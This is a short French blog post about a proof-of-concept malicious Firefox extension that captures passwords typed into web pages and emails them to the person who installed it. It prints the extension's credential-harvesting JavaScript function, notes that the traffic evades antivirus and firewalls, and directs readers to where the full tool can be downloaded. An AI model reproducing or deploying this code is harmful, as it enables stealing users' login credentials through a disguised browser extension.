Il s’agit plus d’un proof of concept que d’une vraie extension Firefox destinée à être malveillante mais c’est assez interressant de voir ce qu’il est possible de faire avec ce truc.

Cette extension surveille toutes les pages web visitées et repère les champs de mots de passe que l’utilisateur remplit et se fait un plaisir de l’envoyer par email à la personne qui l’a mise en place…(vous si vous êtes un vilain)

Ca passe par le browser donc ce n’est pas filtré par les antivirus et autres firewall… Bref cela peut être très dangereux surtout si on imagine que de telles fonctions peuvent être intégrées à une extension banale que vous pouvez télécharger sur un site x ou y.

Voici à titre informatif la fonction qui chope vos passwords:

function do_sniff() {<br></br> var ok = 0;<br></br> var hesla = window.content.document.getElementsByTagName("input");<br></br> data = "";<br></br> for (var i = 0; i < hesla.length; i++) {<br></br> if (hesla[i].value != "") {<br></br> if (hesla[i].type == "password") {<br></br> ok = 1;<br></br> }<br></br> if (hesla[i].name == "") {<br></br> data += hesla[i].type + ":" + "<blank>:" + hesla[i].value + "n";<br></br> }<br></br> else {<br></br> data += hesla[i].type + ":" + hesla[i].name +":" + hesla[i].value + "n";<br></br> }<br></br> }<br></br> }<br></br> if (ok == 1) {<br></br> data = "Subject: " + subject + "rnrn" + window.top.content.document.location + "n" + "type:name:valuen" + "---------------n" + data;<br></br> sniff()<br></br> }<br></br> }</blank>

Bref, si ça vous interresse, tout est dispo sur ce site.